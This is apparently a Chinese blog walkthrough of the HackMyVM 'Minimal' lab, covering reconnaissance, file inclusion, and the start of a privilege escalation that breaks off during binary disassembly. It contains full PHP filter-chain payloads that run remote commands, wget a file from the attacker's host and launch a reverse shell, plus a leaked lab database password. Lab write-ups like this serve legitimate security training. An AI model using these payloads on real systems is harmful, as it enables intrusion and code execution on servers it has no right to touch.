HackMyVM-Minimal

于 2024-05-12 11:25:43 发布
阅读量419 收藏 3
点赞数 3
分类专栏: HackMyVM 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rx3225968517/article/details/138749740
版权

目录

信息收集

arp

nmap

nikto

whatweb

WEB

web信息收集

gobuster

文件包含漏洞

提权

web信息收集

main方法

question_1

question_2

question_3

prize.txt

软连接

信息收集

arp
┌──(root?0x00)-[~/HackMyVM]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:9d:6d:7b, IPv4: 192.168.9.183
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)

192.168.9.205  08:00:27:5a:4c:d4  PCS Systemtechnik GmbH

13 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.259 seconds (113.32 hosts/sec). 13 responded
nmap
端口扫描

┌──(root㉿0x00)-[~/HackMyVM]
└─# nmap -p- 192.168.9.205 --min-rate 10000 -oA ports  
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-11 08:12 CST
Nmap scan report for 192.168.9.205
Host is up (0.0017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:5A:4C:D4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 128.28 seconds


版本信息收集

┌──(root㉿0x00)-[~/HackMyVM]
└─# nmap -sC -sV -O -A -p 22,80 192.168.9.205 --min-rate 10000        
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-11 08:15 CST
Nmap scan report for 192.168.9.205
Host is up (0.0020s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 d2:73:06:e2:e4:84:54:8c:42:0f:4e:81:7c:78:b9:c2 (ECDSA)
|_  256 75:a0:cf:35:61:a1:c8:77:cf:1a:cb:bc:6d:5b:49:75 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Minimal Shop
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
MAC Address: 08:00:27:5A:4C:D4 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   2.04 ms 192.168.9.205

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.68 seconds
nikto
┌──(root㉿0x00)-[~/HackMyVM]
└─# nikto -h 192.168.9.205                 
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.9.205
+ Target Hostname:    192.168.9.205
+ Target Port:        80
+ Start Time:         2024-05-11 08:13:06 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.52 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.52 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /imgs/: Directory indexing found.
+ /imgs/: This might be interesting.
+ /styles/: Directory indexing found.
+ /login.php: Admin login page/section found.
+ 8102 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2024-05-11 08:15:31 (GMT8) (145 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
whatweb
┌──(root㉿0x00)-[~/HackMyVM]
└─# whatweb -v http://192.168.9.205                                   
WhatWeb report for http://192.168.9.205
Status    : 200 OK
Title     : Minimal Shop
IP        : 192.168.9.205
Country   : RESERVED, ZZ

Summary   : Apache[2.4.52], Cookies[PHPSESSID], HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)]

Detected Plugins:
[ Apache ]
  The Apache HTTP Server Project is an effort to develop and 
  maintain an open-source HTTP server for modern operating 
  systems including UNIX and Windows NT. The goal of this 
  project is to provide a secure, efficient and extensible 
  server that provides HTTP services in sync with the current 
  HTTP standards. 

  Version      : 2.4.52 (from HTTP Server Header)
  Google Dorks: (3)
  Website     : http://httpd.apache.org/

[ Cookies ]
  Display the names of cookies in the HTTP headers. The 
  values are not returned to save on space. 

  String       : PHPSESSID

[ HTTPServer ]
  HTTP server header string. This plugin also attempts to 
  identify the operating system from the server header. 

  OS           : Ubuntu Linux
  String       : Apache/2.4.52 (Ubuntu) (from server string)

HTTP Headers:
  HTTP/1.1 200 OK
  Date: Sat, 11 May 2024 00:13:36 GMT
  Server: Apache/2.4.52 (Ubuntu)
  Set-Cookie: PHPSESSID=4glm3feckavkrh5qajsa0regno; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Vary: Accept-Encoding
  Content-Encoding: gzip
  Content-Length: 1209
  Connection: close
  Content-Type: text/html; charset=UTF-8

WEB

web信息收集

主页是一个购物网站!


从源码中可以看到有一个登录后台的!


我们随便注册一个用户,登陆即可!


可以加入购物车!加入几个!


点击 Buy items 尝试购买!


乱填的,点击 End purchase时发现只是把购物车清空而已!

我们先尝试目录扫描吧!
gobuster
┌──(root?0x00)-[~/HackMyVM]
└─# gobuster dir -u http://192.168.9.205 -x php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.205
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 6297]
/login.php            (Status: 200) [Size: 1019]
/register.php         (Status: 200) [Size: 1097]
/admin.php            (Status: 302) [Size: 0] [--> login.php]
/buy.php              (Status: 200) [Size: 892]
/imgs                 (Status: 301) [Size: 313] [--> http://192.168.9.205/imgs/]
/logout.php           (Status: 302) [Size: 0] [--> /index.php]
/config.php           (Status: 200) [Size: 0]
/styles               (Status: 301) [Size: 315] [--> http://192.168.9.205/styles/]
/robots.txt           (Status: 200) [Size: 12]
/restricted.php       (Status: 302) [Size: 0] [--> ../index.php]



扫描出来的信息都是没啥用的信息!

没办法,重新找思路!

大概找了几分钟,我发现了漏洞!

一开始没注意到了!
文件包含漏洞

注意看此处的url!



可以确定了!文件包含漏洞!目录扫描中扫到了config.php,但是利用文件包含的时候加上php会报错,不加反而可以出来!

base64解码后的 config.php内容

<?php
$servername = "localhost";
$username = "shop_admin";
$password = "Hey-Pls-Dont-Crack-This-Passwd";
$dbname = "shop";

$conn = new mysqli($servername, $username, $password, $dbname);

// Verificar la conexión
if ($conn->connect_error) {
    die("Error" . $conn->connect_error);
}

// Configurar el juego de caracteres
$conn->set_charset("utf8");
?>


可以看到用户名和密码

$username = "shop_admin";
$password = "Hey-Pls-Dont-Crack-This-Passwd";

不过没啥用,ssh登录不上,网站后台也登陆不上!尝试读取别的文件!

# index.php

<?php

require_once "./config.php";

session_start();

// Get products
$query = $conn->prepare("SELECT * FROM products");
$query->execute();
$products = $query->get_result();

$logged = false;

if (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true) {
    $logged = true;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if(isset($_POST["product_id"])){
        $_SESSION['cart'][] = $_POST["product_id"];
    }
}
?>


<html lang="es">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./styles/main.css">
    <title>Minimal Shop</title>
</head>

<body>
    <header>
        <div class="logo">
            <a href="./index.php">
                <h1>Minimal</h1>
            </a>
        </div>
        </div>
        <div class="boton-iniciar-sesion">
            <?php
            if ($logged) {
                echo '<a href="shop_cart.php">My cart</a>';
                echo '<a href="logout.php">Sign out</a>';
            } else {
                echo '<a href="login.php">Log In</a>';
            }
            ?>
        </div>
    </header>

    <main>
        <?php
        while ($fila = mysqli_fetch_assoc($products)) {
            $id = $fila['id'];
            $name = $fila['name'];
            $price = $fila['price'];
            $description = $fila['description'];
            $author = $fila['author'];

            echo '<form action="index.php" method="post">
                <div class="contenedor-producto">
                    <div class="imagen-producto">
                        <img src="./imgs/' . $name . '.png" alt="Producto '.$id.'">
                    </div>
                    <div class="informacion-producto">
                        <h2>' . $name . '</h2>
                        <div class="descripcion">
                            <p>Designer: ' . $author . '</p>
                            <p>' . $description . '</p>
                            <p>Price: $' . $price . '</p>
                        </div>';
            if ($logged) {
                if (in_array($id, $_SESSION['cart'])) {
                echo '<p class="buy logtobuy">Added to cart</p>';
                }
                echo '<button class="buy button" type="submit" value="'. $id .'" name="product_id" >Buy</button>';
            } else {
                echo '<p class="buy logtobuy">Log In to buy</p>';
            }
            echo '
                    </div>
                </div>
                </form>
            ';
        };
        ?>
    </main>
</body>

</html>


# admin.php

<?php
require_once "./config.php";

session_start();

if ($_SESSION['username'] !== 'admin') {
    header('Location: login.php');
    exit;
}

$logged = false;

if (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true) {
    $logged = true;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $nombre = $_POST['nombre'];
    $autor = $_POST['autor'];
    $precio = $_POST['precio'];
    $descripcion = $_POST['descripcion'];

    if (isset($_FILES['imagen'])) {
        $imagen = $_FILES['imagen'];
        if ($imagen['error'] === UPLOAD_ERR_OK) {
            $ruta_destino = './imgs/' . basename($imagen['name']);

            if (move_uploaded_file($imagen['tmp_name'], $ruta_destino)) {
                $query = $conn->prepare("INSERT INTO products (name, author, price, description) VALUES (?, ?, ?, ?)");
                $query->bind_param("ssds", $nombre, $autor, $precio, $descripcion);
                // Ejecutar la consulta
                if ($query->execute()) {
                echo "Uploaded";
                } else {
                    echo "Error";
                }
            } else {
                //"Error al subir la imagen.";
                echo "Error";
            }
        } else {
            echo "Error: " . $imagen['error'];
        }
    }
}

?>
<!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./styles/main.css">
    <link rel="stylesheet" href="./styles/admin.css">
    <title>Minimal Shop</title>
</head>

<body>
    <header>
        <div class="logo">
            <a href="./index.php">
                <h1>Minimal</h1>
            </a>
        </div>
        </div>
        <div class="boton-iniciar-sesion">
            <?php
            if ($logged) {
                echo '<a href="logout.php">Cerrar Sesión</a>';
                echo '<a href="shop_cart.php">Mi Carrito</a>';
            } else {
                echo '<a href="login.php">Iniciar Sesión</a>';
            }
            ?>
        </div>
    </header>
    <h1>Admin Panel</h1>
    <div class="container">
        <h1>Add new Product</h1>
        <form action="admin.php" method="post" enctype="multipart/form-data">
            <label for="nombre">Name:</label>
            <input type="text" name="nombre" id="nombre" required>

            <label for="autor">Author:</label>
            <input type="text" name="autor" id="autor" required>

            <label for="precio">Price:</label>
            <input type="number" name="precio" id="precio" required>

            <label for="descripcion">Description:</label>
            <textarea name="descripcion" id="descripcion" required></textarea>

            <label for="imagen">Img:</label>
            <input type="file" name="imagen" id="imagen" accept="image/*" required>

            <input type="submit" value="Upload">
        </form>
    </div>

</body>

</html>


 我参考了群主师傅的wp  https://www.bilibili.com/video/BV19m411d7kE/?vd_source=a883f5a7be6909eff14d565bc161efe8
 
 直接使用的脚本构造的payload!!



http://192.168.9.205/shop_cart.php?action=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&cmd=wget%20http://192.168.9.183:9898/cmd.php


http://192.168.9.205/shop_cart.php?action=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&cmd=php%20reverse.php


执行即可获取shell!

提权

web信息收集
从这开始,噩梦开始了!

获取交互式shell

export TERM=xterm
python3 -c 'import pty;pty.spawn("/bin/bash")'


www-data@minimal:/home/white$ sudo -l
sudo -l
Matching Defaults entries for www-data on minimal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User www-data may run the following commands on minimal:
    (root) NOPASSWD: /opt/quiz/shop
www-data@minimal:/home/white$ 


www-data@minimal:/opt/quiz$ ls
ls
prize.txt  results.txt  shop
www-data@minimal:/opt/quiz$ cat prize.txt     
cat  prize.txt
cat: prize.txt: Permission denied
www-data@minimal:/opt/quiz$ cat results.txt
cat results.txt
User: 0xH3rshel
Points: 3



prize.txt 文件不能看!

经过测试 shop 这个可执行程序存在溢出漏洞!

我们把shop文件下载本地进行逆向分析!
main方法

amd x86-64架构!

我们反编译一下!

推荐使用ida,cutter等等,我这里使用的r2用习惯了!



可以看到程序中存在 question_1、question_2、question_3等自定义函数!

[0x00401150]> afl
0x004010c0    1     11 sym.imp.puts
0x004010d0    1     11 sym.imp.fclose
0x004010e0    1     11 sym.imp.strlen
0x004010f0    1     11 sym.imp.system
0x00401100    1     11 sym.imp.printf
0x00401110    1     11 sym.imp.fgets
0x00401120    1     11 sym.imp.strcmp
0x00401130    1     11 sym.imp.fprintf
0x00401140    1     11 sym.imp.fopen
0x00401150    1     37 entry0
0x00401190    4     31 sym.deregister_tm_clones
0x004011c0    4     49 sym.register_tm_clones
0x00401200    3     32 sym.__do_global_dtors_aux
0x00401230    1      6 sym.frame_dummy
0x00401750    1     13 sym._fini
0x00401274   10    301 sym.secret_q2
0x0040147e    7    198 sym.question_2
0x00401180    1      5 sym._dl_relocate_static_pie
0x004015d5    1     10 sym.wait_what
0x0040168f    5    193 main
0x004015e2    4    173 sym.writeResults
0x004013a1    4    100 sym.secret_q3
0x00401405    4    121 sym.question_1
0x00401544    4    145 sym.question_3
0x00401236    3     62 sym.print_prize
0x00401000    3     27 sym._init
[0x00401150]> 


[0x00401150]> s main
[0x0040168f]> s
0x40168f

跳到main方法的主入口!

[0x0040168f]> pdf 
            ; DATA XREF from entry0 @ 0x401168(r)
┌ 193: int main (int argc, char **argv);
│           ; arg int argc @ rdi
│           ; arg char **argv @ rsi
│           ; var char *s @ rbp-0x8
│           ; var char *var_10h @ rbp-0x10
│           ; var uint32_t var_14h @ rbp-0x14
│           ; var int64_t var_18h @ rbp-0x18
│           ; var int64_t var_20h @ rbp-0x20
│           ; var int64_t var_24h @ rbp-0x24
│           ; var char **var_30h @ rbp-0x30
│           0x0040168f      f30f1efa       endbr64
│           0x00401693      55             push rbp
│           0x00401694      4889e5         mov rbp, rsp
│           0x00401697      4883ec30       sub rsp, 0x30
│           0x0040169b      897ddc         mov dword [var_24h], edi    ; argc
│           0x0040169e      488975d0       mov qword [var_30h], rsi    ; argv
│           0x004016a2      48b8726573..   movabs rax, 0x2e73746c75736572 ; 'results.'
│           0x004016ac      488945e0       mov qword [var_20h], rax
│           0x004016b0      c745e87478..   mov dword [var_18h], 0x747874 ; 'txt'
